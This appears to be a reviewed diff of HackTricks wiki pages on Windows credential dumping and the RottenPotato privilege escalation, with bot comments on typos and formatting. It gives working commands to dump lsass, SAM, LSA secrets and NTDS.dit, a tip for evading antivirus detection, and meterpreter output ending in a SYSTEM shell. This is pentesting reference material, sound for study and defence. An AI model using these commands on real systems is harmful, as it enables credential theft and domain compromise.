You can use this tool to **dump the lsass process**, **download the dump** and **extract** the **credentials locally** from the dump. You can use this tool to **dump the lsass process**, **download the dump** and **extract** the **credentials locally** from the dump.
{% code title="Dump lsass" %} {% code title="Dump lsass" %}
@ -93,7 +99,7 @@ This process is done automatically with [SprayKatz](https://github.com/aas-n/spr
**Note**: Some **AV** may **detect** as **malicious** the use of **procdump.exe to dump lsass.exe**, this is because they are **detecting** the string **"procdump.exe" and "lsass.exe"**. So it is **stealthier** to **pass** as an **argument** the **PID** of lsass.exe to procdump **instead o**f the **name lsass.exe.** **Note**: Some **AV** may **detect** as **malicious** the use of **procdump.exe to dump lsass.exe**, this is because they are **detecting** the string **"procdump.exe" and "lsass.exe"**. So it is **stealthier** to **pass** as an **argument** the **PID** of lsass.exe to procdump **instead o**f the **name lsass.exe.**
## Dumping lsass with **comsvcs.dll** ### Dumping lsass with **comsvcs.dll**
Theres a DLL called **comsvcs.dll**, located in `C:\Windows\System32` that **dumps process memory** whenever they **crash**. This DLL contains a **function** called **`MiniDumpW`** that is written so it can be called with `rundll32.exe`.\ Theres a DLL called **comsvcs.dll**, located in `C:\Windows\System32` that **dumps process memory** whenever they **crash**. This DLL contains a **function** called **`MiniDumpW`** that is written so it can be called with `rundll32.exe`.\
The first two arguments are not used, but the third one is split into 3 parts. First part is the process ID that will be dumped, second part is the dump file location, and third part is the word **full**. There is no other choice.\ The first two arguments are not used, but the third one is split into 3 parts. First part is the process ID that will be dumped, second part is the dump file location, and third part is the word **full**. There is no other choice.\
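Review bot: the "**Note**" context line in this hunk states that some AV products flag procdump.exe dumping lsass.exe, which contradicts the unchanged line "it's not detected by Defender" under Procdump + Mimikatz above; qualify that earlier sentence (the binary itself is a signed Microsoft tool, but using it against lsass can still be flagged) so the two sections agree. Also, in the first line of the comsvcs.dll paragraph, `Theres a DLL` should be `There's a DLL`.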
@ -108,44 +114,44 @@ We just have to keep in mind that this technique can only be executed as **SYSTE
**You can automate this process with** [**lssasy**](https://github.com/Hackndo/lsassy)**.** **You can automate this process with** [**lssasy**](https://github.com/Hackndo/lsassy)**.**
# CrackMapExec ## CrackMapExec
## Dump SAM hashes ### Dump SAM hashes
``` ```
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam
``` ```
## Dump LSA secrets ### Dump LSA secrets
``` ```
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa
``` ```
## Dump the NTDS.dit from target DC ### Dump the NTDS.dit from target DC
``` ```
cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss #~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
``` ```
## Dump the NTDS.dit password history from target DC ### Dump the NTDS.dit password history from target DC
``` ```
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-history #~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-history
``` ```
## Show the pwdLastSet attribute for each NTDS.dit account ### Show the pwdLastSet attribute for each NTDS.dit account
``` ```
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-pwdLastSet #~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-pwdLastSet
``` ```
# Stealing SAM & SYSTEM ## Stealing SAM & SYSTEM
This files should be **located** in _C:\windows\system32\config\SAM_ and _C:\windows\system32\config\SYSTEM._ But **you cannot just copy them in a regular way** because they protected. This files should be **located** in _C:\windows\system32\config\SAM_ and _C:\windows\system32\config\SYSTEM._ But **you cannot just copy them in a regular way** because they protected.
## From Registry ### From Registry
The easiest way to steal those files is to get a copy from the registry: The easiest way to steal those files is to get a copy from the registry:
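Review bot: the link text `[**lssasy**](https://github.com/Hackndo/lsassy)` at the top of this hunk misspells the tool; it should read `lsassy` to match the URL. The five CrackMapExec code fences in this hunk are untagged (bare ```) while the rest of the page tags its shell blocks with ```bash; tag them the same way for consistent highlighting. Under "Stealing SAM & SYSTEM", "This files should be **located** in ... because they protected" should read "These files should be **located** in ... because they are protected."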
@ -162,11 +168,11 @@ samdump2 SYSTEM SAM
impacket-secretsdump -sam sam -security security -system system LOCAL impacket-secretsdump -sam sam -security security -system system LOCAL
``` ```
## Volume Shadow Copy ### Volume Shadow Copy
You can perform copy of protected files using this service. You need to be Administrator. You can perform copy of protected files using this service. You need to be Administrator.
### Using vssadmin #### Using vssadmin
vssadmin binary is only available in Windows Server versions vssadmin binary is only available in Windows Server versions
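Review bot: the context line "vssadmin binary is only available in Windows Server versions" under the newly demoted `#### Using vssadmin` heading is imprecise: vssadmin.exe ships on client editions as well (`vssadmin list shadows` works on Windows 10); it is the `create shadow` subcommand this trick relies on that is limited to Server editions. Reword to "`vssadmin create shadow` is only available on Windows Server editions".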
@ -196,7 +202,7 @@ $voume.Delete();if($notrunning -eq 1){$service.Stop()}
Code from the book: [https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html](https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html) Code from the book: [https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html](https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html)
## Invoke-NinjaCopy ### Invoke-NinjaCopy
Finally, you could also use the [**PS script Invoke-NinjaCopy**](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1) to make a copy of SAM, SYSTEM and ntds.dit. Finally, you could also use the [**PS script Invoke-NinjaCopy**](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1) to make a copy of SAM, SYSTEM and ntds.dit.
@ -204,12 +210,12 @@ Finally, you could also use the [**PS script Invoke-NinjaCopy**](https://github.
Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\sam" -LocalDestination "c:\copy_of_local_sam" Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\sam" -LocalDestination "c:\copy_of_local_sam"
``` ```
# **Active Directory Credentials - NTDS.dit** ## **Active Directory Credentials - NTDS.dit**
**The Ntds.dit file is a database that stores Active Directory data**, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain. **The Ntds.dit file is a database that stores Active Directory data**, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain.
The important NTDS.dit file will be **located in**: _%SystemRoom%/NTDS/ntds.dit_\ The important NTDS.dit file will be **located in**: _%SystemRoom%/NTDS/ntds.dit_\
__This file is a database _Extensible Storage Engine_ (ESE) and is "officially" composed by 3 tables: \_\_This file is a database _Extensible Storage Engine_ (ESE) and is "officially" composed by 3 tables:
* **Data Table**: Contains the information about the objects (users, groups...) * **Data Table**: Contains the information about the objects (users, groups...)
* **Link Table**: Information about the relations (member of...) * **Link Table**: Information about the relations (member of...)
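Review bot: the right-hand side of the NTDS.dit sentence now starts with `\_\_This file is a database`, i.e. two leftover underscores have been escaped into literal text instead of removed; drop the `__` entirely. Two more fixes on the surrounding context lines: `%SystemRoom%` in `_%SystemRoom%/NTDS/ntds.dit_` should be `%SystemRoot%`, and "composed by 3 tables" should be "composed of 3 tables". Finally, the command in the fenced block at the top of the hunk, `Invoke-NinjaCopy.ps1 -Path ... -LocalDestination ...`, calls the script file directly; the PowerSploit script only defines the `Invoke-NinjaCopy` function, so it has to be dot-sourced or imported first and then `Invoke-NinjaCopy -Path ... -LocalDestination ...` invoked.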
@ -217,9 +223,9 @@ __This file is a database _Extensible Storage Engine_ (ESE) and is "officially"
More information about this: [http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/](http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/) More information about this: [http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/](http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/)
Windows uses _Ntdsa.dll_ to interact with that file and its used by _lsass.exe_. Then, **part** of the **NTDS.dit** file could be located **inside the **_**lsass**_** memory** (you can find the lastet accessed data probably because of the performance impruve by using a **cache**). Windows uses _Ntdsa.dll_ to interact with that file and its used by _lsass.exe_. Then, **part** of the **NTDS.dit** file could be located **inside the \_lsass**\_\*\* memory\*\* (you can find the lastet accessed data probably because of the performance impruve by using a **cache**).
### Decrypting the hashes inside NTDS.dit #### Decrypting the hashes inside NTDS.dit
The hash is cyphered 3 times: The hash is cyphered 3 times:
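Review bot: the right-hand side of the lsass sentence in this hunk is broken markup: `**inside the \_lsass**\_\*\* memory\*\*` escapes the underscores and asterisks so they render literally; the intended formatting is `**inside the _lsass_ memory**`. The same line also has "its used by _lsass.exe_" (should be "it's used by"), "lastet" (latest) and "impruve" (improvement).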
@ -229,7 +235,7 @@ The hash is cyphered 3 times:
**PEK** have the **same value** in **every domain controller**, but it is **cyphered** inside the **NTDS.dit** file using the **BOOTKEY** of the **SYSTEM file of the domain controller (is different between domain controllers)**. This is why to get the credentials from the NTDS.dit file **you need the files NTDS.dit and SYSTEM** (_C:\Windows\System32\config\SYSTEM_). **PEK** have the **same value** in **every domain controller**, but it is **cyphered** inside the **NTDS.dit** file using the **BOOTKEY** of the **SYSTEM file of the domain controller (is different between domain controllers)**. This is why to get the credentials from the NTDS.dit file **you need the files NTDS.dit and SYSTEM** (_C:\Windows\System32\config\SYSTEM_).
## Copying NTDS.dit using Ntdsutil ### Copying NTDS.dit using Ntdsutil
Available since Windows Server 2008. Available since Windows Server 2008.
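Review bot: besides the demotion of `## Copying NTDS.dit using Ntdsutil` to `###`, the context line above it says "**PEK** have the **same value**"; it should be "**PEK** has the **same value**", and "cyphered" in the same sentence should be "encrypted".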
@ -239,7 +245,7 @@ ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit
You could also use the [**volume shadow copy**](./#stealing-sam-and-system) trick to copy the **ntds.dit** file. Remember that you will also need a copy of the **SYSTEM file** (again, [**dump it from the registry or use the volume shadow copy**](./#stealing-sam-and-system) trick). You could also use the [**volume shadow copy**](./#stealing-sam-and-system) trick to copy the **ntds.dit** file. Remember that you will also need a copy of the **SYSTEM file** (again, [**dump it from the registry or use the volume shadow copy**](./#stealing-sam-and-system) trick).
## **Extracting hashes from NTDS.dit** ### **Extracting hashes from NTDS.dit**
Once you have **obtained** the files **NTDS.dit** and **SYSTEM** you can use tools like _secretsdump.py_ to **extract the hashes**: Once you have **obtained** the files **NTDS.dit** and **SYSTEM** you can use tools like _secretsdump.py_ to **extract the hashes**:
@ -257,7 +263,7 @@ For **big NTDS.dit files** it's recommend to extract it using [gosecretsdump](ht
Finally, you can also use the **metasploit module**: _post/windows/gather/credentials/domain\_hashdump_ or **mimikatz** `lsadump::lsa /inject` Finally, you can also use the **metasploit module**: _post/windows/gather/credentials/domain\_hashdump_ or **mimikatz** `lsadump::lsa /inject`
# Lazagne ## Lazagne
Download the binary from [here](https://github.com/AlessandroZ/LaZagne/releases). you can use this binary to extract credentials from several software. Download the binary from [here](https://github.com/AlessandroZ/LaZagne/releases). you can use this binary to extract credentials from several software.
@ -265,13 +271,13 @@ Download the binary from [here](https://github.com/AlessandroZ/LaZagne/releases)
lazagne.exe all lazagne.exe all
``` ```
# Other tools for extracting credentials from SAM and LSASS ## Other tools for extracting credentials from SAM and LSASS
## Windows credentials Editor (WCE) ### Windows credentials Editor (WCE)
This tool can be used to extract credentials from the memory. Download it from: [http://www.ampliasecurity.com/research/windows-credentials-editor/](https://www.ampliasecurity.com/research/windows-credentials-editor/) This tool can be used to extract credentials from the memory. Download it from: [http://www.ampliasecurity.com/research/windows-credentials-editor/](https://www.ampliasecurity.com/research/windows-credentials-editor/)
## fgdump ### fgdump
Extract credentials from the SAM file Extract credentials from the SAM file
@ -280,7 +286,7 @@ You can find this binary inside Kali, just do: locate fgdump.exe
fgdump.exe fgdump.exe
``` ```
## PwDump ### PwDump
Extract credentials from the SAM file Extract credentials from the SAM file
@ -290,14 +296,20 @@ PwDump.exe -o outpwdump -x 127.0.0.1
type outpwdump type outpwdump
``` ```
## PwDump7 ### PwDump7
Download it from:[ http://www.tarasco.org/security/pwdump\_7](http://www.tarasco.org/security/pwdump\_7) and just **execute it** and the passwords will be extracted. Download it from:[ http://www.tarasco.org/security/pwdump\_7](http://www.tarasco.org/security/pwdump\_7) and just **execute it** and the passwords will be extracted.
# Defenses ## Defenses
[**Learn about some credentials protections here.**](credentials-protections.md) [**Learn about some credentials protections here.**](credentials-protections.md)
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
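Review bot: this is the second copy of the Securityboat callout in the same file (the first was inserted directly under the top `</details>` block in an earlier hunk); one placement per page is enough, and the `style="danger"` concern raised on the first copy applies here too. Also, in the context line `Download it from:[ http://www.tarasco.org/security/pwdump\_7](...)` the leading space belongs outside the link text: `Download it from: [http://www.tarasco.org/security/pwdump\_7](...)`.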
@ -314,5 +326,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -1,4 +1,4 @@
# RottenPotato
<details> <details>
@ -16,10 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
The info in this page info was extracted [from this post](https://www.absolomb.com/2018-05-04-HackTheBox-Tally/) The info in this page info was extracted [from this post](https://www.absolomb.com/2018-05-04-HackTheBox-Tally/)
Service accounts usually have special privileges \(SeImpersonatePrivileges\) and this could be used to escalate privileges. Service accounts usually have special privileges (SeImpersonatePrivileges) and this could be used to escalate privileges.
[https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/) [https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/)
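Review bot: the context line directly below the inserted callout reads "The info in this page info was extracted", with "info" twice; drop the second one. In the following changed line the unescaping of `\(SeImpersonatePrivileges\)` to `(SeImpersonatePrivileges)` is correct, but the privilege name itself is `SeImpersonatePrivilege` (singular); fix the name while the line is being touched.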
@ -27,7 +33,7 @@ I wont go into the details on how this exploit works, the article above expla
Lets check our privileges with meterpreter: Lets check our privileges with meterpreter:
```text ```
meterpreter > getprivs meterpreter > getprivs
Enabled Process Privileges Enabled Process Privileges
@ -47,7 +53,7 @@ Excellent, it looks like we have the privileges we need to perform the attack. L
Back on our meterpreter session we load the `incognito` extension. Back on our meterpreter session we load the `incognito` extension.
```text ```
meterpreter > use incognito meterpreter > use incognito
Loading extension incognito...Success. Loading extension incognito...Success.
meterpreter > list_tokens -u meterpreter > list_tokens -u
@ -67,7 +73,7 @@ No tokens available
We can see we currently have no Impersonation Tokens. Lets run the Rotten Potato exploit. We can see we currently have no Impersonation Tokens. Lets run the Rotten Potato exploit.
```text ```
meterpreter > execute -f rottenpotato.exe -Hc meterpreter > execute -f rottenpotato.exe -Hc
Process 3104 created. Process 3104 created.
Channel 2 created. Channel 2 created.
@ -88,7 +94,7 @@ NT AUTHORITY\SYSTEM
We need to quickly impersonate the token or it will disappear. We need to quickly impersonate the token or it will disappear.
```text ```
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM" meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable [-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
Call rev2self if primary process token is SYSTEM Call rev2self if primary process token is SYSTEM
@ -100,7 +106,12 @@ Server username: NT AUTHORITY\SYSTEM
Success! We have our SYSTEM shell and can grab the root.txt file! Success! We have our SYSTEM shell and can grab the root.txt file!
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
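Review bot: second copy of the Securityboat callout on this page, placed six lines above the existing swag/PR footer; the first copy was added under the top `</details>` in the earlier hunk. Keep one placement, and if it stays, use `style="info"` rather than `danger` so the red callout is not read as a warning about the RottenPotato technique described in the line above it.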
@ -117,5 +128,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>